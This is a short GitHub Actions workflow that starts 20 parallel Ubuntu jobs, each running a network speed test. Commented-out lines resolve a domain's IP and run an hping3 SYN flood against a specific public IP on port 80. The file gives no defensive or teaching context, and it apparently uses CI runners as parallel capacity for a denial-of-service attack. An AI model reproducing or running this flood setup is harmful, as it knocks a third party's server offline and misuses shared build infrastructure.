on:
  push:
    branches:
      - main
  workflow_dispatch: # 允许手动触发工作流

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

jobs:
  test-concurrency:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    timeout-minutes: 5
    steps:
      - name: Print Job Number
        run: |
          sudo apt install speedtest-cli
          speedtest-cli


          # getent ahostsv4 ioswy.com
          # IP=$(getent ahostsv4 ioswy.com | awk '{print $1}' | head -n 1)
          # echo $IP

          # sudo apt install hping3 -q && sudo hping3 -S --flood -V -d 1400 -p 80 -s 1000-2000 47.239.67.12
